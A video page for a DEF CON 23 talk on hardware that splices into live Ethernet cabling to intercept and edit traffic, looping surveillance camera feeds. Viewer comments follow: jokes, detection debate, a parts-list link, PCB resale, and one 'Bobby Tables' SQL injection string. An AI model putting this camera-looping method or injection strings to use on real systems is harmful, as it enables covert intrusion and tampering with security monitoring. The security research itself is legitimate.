DEF CON 23 - Van Albert and Banks - Looping Surveillance Cameras through Live Editing
Vložit
- čas přidán 24. 12. 2015
- This project consists of the hardware and software necessary to hijack wired network communications. The hardware allows an attacker to splice into live network cabling without ever breaking the physical connection. This allows the traffic on the line to be passively tapped and examined. Once the attacker has gained enough knowledge about the data being sent, the device switches to an active tap topology, where data in both directions can be modified on the fly. Through our custom implementation of the network stack, we can accurately mimic the two devices across almost all OSI layers.
We have developed several applications for this technology. Most notable is the editing of live video streams to produce a “camera loop,” that is, hijacking the feed from an Ethernet surveillance camera so that the same footage repeats over and over again. More advanced video transformations can be applied if necessary. This attack can be executed and activated with practically no interruption in service, and when deactivated, is completely transparent.
Speaker Bios:
Eric is a recent MIT graduate who spends his days building 3D printers for Formlabs and his nights crawling around places he probably shouldn’t. He has taught seminars on lockpicking and physical security vulnerabilities to various audiences at the Institute, and done a small bit of security consulting work. When he runs out of projects to hack on, he reads the leaked NSA ANT catalog for ideas.
Zach is also a recent MIT graduate with over 0 years of security experience. He’s particularly interested in the security of embedded devices and knots. In his free time, he enjoys putting household appliances on the internet and refactoring his old code. - Věda a technologie
"Zach is also a recent MIT graduate with over 0 years of security experience." laughed my ass off
"Everyone who cheered is a fed" that was the most I laughed at anyone's defcon intro ever.
This is now one of my top Defcon-talks. THANKS!
Yes it was amazing!
Thanks guys!
very good talk!~
i love the description "Zach is also a recent MIT graduate with over 0 years of security experience"
look at all that experience
these guys may not be the best speakers, and while high level this seems pretty self explanatory, these guys went all out and really committed to doing it properly, one of the best talks ive seen. Im happy they explained the lower levels without just showing how "cool" it is like some other talks do.
10:03 His statement about them being invisible to cable analyzers. It depends. The generic $100 ones you'll see many self-employed contractors use wouldn't see a difference. The test kits we lug around on a cart at work get fussy if we untwist the wires before terminating them. So it's likely they'd throw an error of some sort.
But most cables are only certified and tested when they are installed, or if the devices they are connected to are having issues. So it's unlikely that a system like this would be discovered unless it caused a significant drop in performance.
That's what I was thinking with oscilloscopes. 50mhz might not spot it but a 1ghz would see the cable moving when they touched it.
I agree with the conclusion unless it starts saying "you are being haxed lol, gg" with a cartoon dog dancing around the vault, which by the way I would love to see played out in a movie with a guard trying to figure out what's going on.
I don't think it was mentioned (Or I might have missed it during the talk), but the twisting itself is also extremely important, and untwisting them too much can cause degradation in the signal. You can tell a good network engineer and a wiremonkey using punchdown by how long the leads are before they twist up. It's a good idea to untwist as LITTLE as possible. Also, same thing with those who crimp their own cables, try to untwist as little as possible. It not only works better, it looks professional :)
i learned that up to 1,5cm ( 13/25 of an inch) is the max to go without problems
Yeah, they covered that in the talk.
Ahhh yes, thanks to common-mode rejection, any interference introduced on one single wire also gets introduced on the other wire in a twisted pair. Then the interference gets canceled out. This only works if they are twisted due to the fact that if the interference is allowed into only one single wire and not the other in the twisted pair, it gets accepted as a valid signal.
Excellent work, I really like the Python stack for hacking the various protocol layers. Nice!
Forget looping, time to play Mission Impossible level video games now
This was an amazing topic to cover, and I think that they covered it very well! However, I do not support bagging on Riley from National Treasure, that was what sparked my interest in technology as a kid.
Brilliant guys! Enjoyed the talk.
*Public Butt
*Private Butt
*Hybrid Butt
*???
*Profit!
why does the con logo get more screen space than the actual presenters? wtf
its a scam
Because they can't really change the aspect ratio of the video, so, with the way they arranged the two streams, there is inevitably going to be a bunch of wasted screen real estate, which they decided to use for the logo.
with access to two segments far enough apart im sure one could passively resolve individual bits streams from each end of a gigabit ethernet link with reasonable effectiveness
Incredible
fantastic demo, love the giggling like a school girl!
Amazing stuff.
I never though it's possible to connect to Ethernet without disturbing connection :D
It isn't, not Gig-E anyway. You can (passively) tap 100mbit ethernet (see Great Scott's "Throwing Star Lan Tap") but the point of this is to modify the data not just sniff it). What their board is doing is the fancy equivalent of quickly unplugging the a network cable then reconnecting it to a dual-port NIC that is passing/modifying the packets. If you do it quickly it's pretty unlikely that anyone would notice. You're right to some degree - they point out in the Q+A that it's possible to optimize the renegotiation of the intercepting NICs so that there's no obvious up/down transition on the PHYs on network being patched;.
Wild card L2 forward ports or force VLAN ports on switch. Granted the switch has to support it but it would do this pretty easily. No POE outage, link log entries, or wire cuts. Isn't software just grand.
incredible
the "cloud to butt" technique is awesome
The Advantages of Public Butt
best opening ever
What's next, they're gonna get Robert ')DROP TABLE Students;-- to present?
Little Bobby Tables we call him
this is epic
Awesome
These guys are great...don't get me wrong....but, this reminds me of early Beavis and Butthead episodes. "Hey Beavis....yeah?... I totally changed their website to butt...huh..hee hee...ugh huh hee...TP my bunghole!"
10/10
good shit
With MITM on HDMI you should be able to fake HDCP authentication, and forward decrypted steam elsewhere. Could just use multiple cables tho :/
would be good to somehow connect 8, or at least 4 of the punch connector tools so you can make multiple conections at once
Someone: What Do You Do?
Me: I Do Shit.
love this shit
Is there a device that can do this without splicing the wires even if the connection is broken for a few seconds? (ex taking the cat 5e and plugging it into the device while its connected into the system)
NSA like ''hold my beer''
cool shit ;)
good
almost like beavis and butthead but for entertainment sheer brilliance
the vault looks like it's probably a ch751 anyway :P
Couldn't the signal be passively tapped (relative to the cable) with some opamps and a small battery? I'd think a simple voltage follower/unity-gain amp could feed off the lines and reproduce the signal with nearly zero current loss.
(ed: nm I'm guessing that's what's being done with the usb supply.)
hmmm nice ideea, the only problem i could think is the capacitance of the lines... but they took it to the next level with the live editing of the live stream
A passive tap isn't very useful is it - the point is to intercept and modify the video, not just copy it.
Dr Tune I'd consider a passive tap useful. Being able to confirm viewing angles of camera feeds, occupation of rooms and movement of staff, etc.
But how do we know they didn't live edit the camera showing the video feed to look like they looped the feed, but didn't?
[CLAP] lol love it ! !
HAK5 now has man in the middle for hdmi
hmm. Easy low level safety against this would be a clock on top of that safe that can't be manipulated and would be easy to detect if looped. Cool show still.
.... or just Gigabit infrastructure as he stated at the beginning... If you have a business which has a safe which is being monitored by camera on a 10[0]baseT network...
They basically covered that with the timestamp thing. Just merge that part of the stream.
@22:00
I was laughing along.
cool shit
Guy asking question: "...ninth degree."
...you mean n'th degree?? lol.
a ninth degree of most things is also a lot
Freudian slip
throw in a gsm sim for a remote connection
23:09 and what about RTMP :D
You can run it on the new pi lol its 64 bits now .
Most security guards don't give a shit what happens you won't even need that. Most of the videos are very small and they don't even look at them it is just when something happens they have to spend a lot of time rerunning the video to see what happened by that time they bad guys are long gone.
[00:00] Introducer does a good 'Trump' imitation before that became popular...
[07:39] couldn't you tap in two places and combine differentially for direction...
[12:29] "without ever interrupting"-but it is interrupting impedance-matching...
gradual-transition might be done with a ferrite clamp and 'smart' terminators...
[30:45] You could try Trojan-joke-ware to make it look like the camera fell off its mount and is dangling-about on its cable-distracting viewers a few seconds....
Anyone else think of payday ?
Jean-Jacques Chirac guys the thermal drill, go get it
The only other evidence is the punched/spliced wires :)
which won't have to be inspected if nothing breaks up
Solution: Lots of thermite
Steven Haussmann go the route of "badboys 2" and when you're out the building, blow up the tap device.
I think the wires are the least of a banks problem if this were to happen to them.
I'd tap that
2 people got caught trying to rob a bank without this method.
Vigil players when they use erc-7
Guys has anyone seen bain, I have an idea to tell him
Cool concept.... But man that delivery....
Cool Down Down Date & Time For A Minute
BEEF!!
If Anyone is looking to buy one of these tap boards "PCB Board Only" I've purchased 20 of them to get into programming. Just be aware that the project can get quite pricey. The Boards are cheap to produce, but some of the components to complete a working board can cost around 190 bucks all together. I'm selling the boards for 15 bucks each with shipping included. I bought them in bulk before I knew how much all the components to complete the board cost. If you'd like a picture of the boards I have just shoot me a message.
if you download REV 3 from their Github. From there you should see the DOM. That is a list of all the components. All you have to do is import the DOM into digikey. All the components cost around 212 USD.
github.com/ervanalb/lens/blob/master/hardware/release/bom.txt
its all in there , the expensive part are the relays all other parts are cheap
Claudia Hampton do you have any additional boards available for purchase?
Do you have any pcbs? I would be willing to buy one or two off you and pay for shipping.
Can't you use cheaper relays?
kid in black laughs like a dweeb
I haven't seen anyone use that insult in a long time... But it is true. x)
it's called a nerdgasm
Cute girl though
_inhales_ heee
'tism laughing.
anyone here that girly mouse laugh lol!!!
thats alot of shit lol haha
A brilliant presentation despite the ANNOYING PERSON GIGGLING IN HIS MIC.
Amazing work anyway !
intro from king cringe
he said a lot of cool shit
The easier solution is not to tap the ethernet traffic, but the video feed. Duplicate what goes into the glass lenses, and then feed that into the circuit directly. That's the same as the "low tech" that they said was "too easy"...Gotta love it when people pride themselves in making things harder and more risky than required.
brandon day the video feed IS the Ethernet traffic.
Am I the only one that gets annoyed by people with speech patterns like the guy in orange?
They've DEFINATELY never seen any decent cable diag machine. I've practiced with one this year in school and a tiny 1500€ monster knows every fucking twist in the cable in 30 km radius. They're monsters to detect any change in the cable. The Rtp&video part was boring af.